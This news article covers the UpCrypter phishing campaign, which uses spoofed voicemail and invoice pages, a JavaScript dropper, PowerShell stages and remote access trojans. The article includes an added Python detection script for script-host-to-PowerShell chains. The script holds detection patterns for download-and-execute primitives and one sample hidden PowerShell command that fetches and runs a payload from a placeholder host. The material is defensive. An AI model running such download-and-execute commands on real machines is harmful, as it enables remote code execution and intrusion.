UpCrypter Phishing Campaign Escalates Cyber Threat
Hackers are employing sophisticated phishing tactics to deploy a malware loader known as UpCrypter, granting them long-term control over Windows devices worldwide. Disguised as voicemails or purchase order messages, these phishing emails redirect recipients to highly personalised spoofed sites. Those who download the attachments are compromised through a multi-stage infection chain that ultimately installs powerful Remote Access Trojans.
Fortinet's FortiGuard Labs has tracked the campaign, observing how HTML attachments such as “Missed Phone Call” or invoice-themed files send users to counterfeit landing pages. These pages display the victim's own domain and company logo, bolstering credibility before prompting the download of a ZIP archive containing an obfuscated JavaScript dropper for UpCrypter.
Once the dropper is executed, PowerShell commands run stealthily to contact attacker-controlled servers. The dropper performs checks for sandboxing or forensic tools and may trigger a system reboot if such tools are detected, effectively evading analysis.
Following these checks, UpCrypter downloads additional malicious payloads, frequently concealed within image files using steganography, or delivered as plain text meant for in-memory execution. Among the RATs deployed are PureHVNC, DCRat, and Babylon RAT. These tools enable attackers to maintain persistent remote access and carry out spying or data exfiltration operations.
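The chain described above (a .js dropper extracted from a ZIP, run by a script host, spawning PowerShell that downloads and executes content in memory) can be surfaced from process-creation telemetry by pairing each PowerShell process with its parent. The following is an added detection example, not code from the article or from FortiGuard Labs; the event fields, the regexes and the sample events are constructed assumptions rather than real indicators.

```python
"""Flag script-host -> PowerShell download-and-execute chains in process telemetry.
Added example; ProcEvent fields and SAMPLE_EVENTS are constructed, not real data."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Download primitives and in-memory execution markers commonly seen in droppers
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
INMEM_RE = re.compile(r"\biex\b|invoke-expression|-enc(odedcommand)?\b", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str


def is_js_dropper(ev: ProcEvent) -> bool:
    """Script host (wscript/cscript) launched with a .js file on its command line."""
    return ev.image.lower() in SCRIPT_HOSTS and re.search(r"\.js\b", ev.cmdline, re.I) is not None


def is_suspicious_powershell(ev: ProcEvent) -> bool:
    """PowerShell that both fetches remote content and executes it in memory."""
    return (ev.image.lower() in {"powershell.exe", "pwsh.exe"}
            and DOWNLOAD_RE.search(ev.cmdline) is not None
            and INMEM_RE.search(ev.cmdline) is not None)


def find_dropper_chains(events):
    """Return (dropper_pid, powershell_pid) pairs where a .js script host is the
    direct parent of a download-and-execute PowerShell process."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if is_suspicious_powershell(ev):
            parent = by_pid.get(ev.ppid)
            if parent is not None and is_js_dropper(parent):
                hits.append((parent.pid, ev.pid))
    return hits


# Constructed sample telemetry: a benign admin PowerShell, then a ZIP-extracted
# .js dropper whose child PowerShell downloads and IEX-executes a payload.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "powershell.exe", "powershell.exe Get-Service | Out-File svc.txt"),
    ProcEvent(300, 100, "wscript.exe", r'wscript.exe "C:\Users\u\AppData\Local\Temp\Temp1_Missed_Call.zip\voicemail.js"'),
    ProcEvent(301, 300, "powershell.exe", "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.txt')"),
]

if __name__ == "__main__":
    for dropper, ps in find_dropper_chains(SAMPLE_EVENTS):
        print(f"suspicious chain: script host pid {dropper} -> powershell pid {ps}")
```

Real deployments would extend the parent lookup beyond one level (the dropper may stage through cmd.exe) and join with file-creation events for the ZIP extraction path.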
Security researchers describe the campaign as dynamic and dangerously adaptive. Detection counts have reportedly more than doubled within a fortnight, reflecting a rapid spread across sectors including manufacturing, healthcare, technology, construction, retail, and hospitality. Geographic hotspots include Austria, Belarus, Canada, Egypt, India, and Pakistan.
This operation marks a notable shift from credential-harvesting phishing to full-blown network infiltration. As J Stephen Kowski, Field CTO at SlashNext Email Security, stresses, “this isn't a one-time data theft: it's a full system breach that can spread quietly inside company networks.” Frankie Sclafani, Director of Cybersecurity Enablement at Deepwatch, similarly termed the campaign “a highly sophisticated and dangerous threat”, urging adoption of layered defences.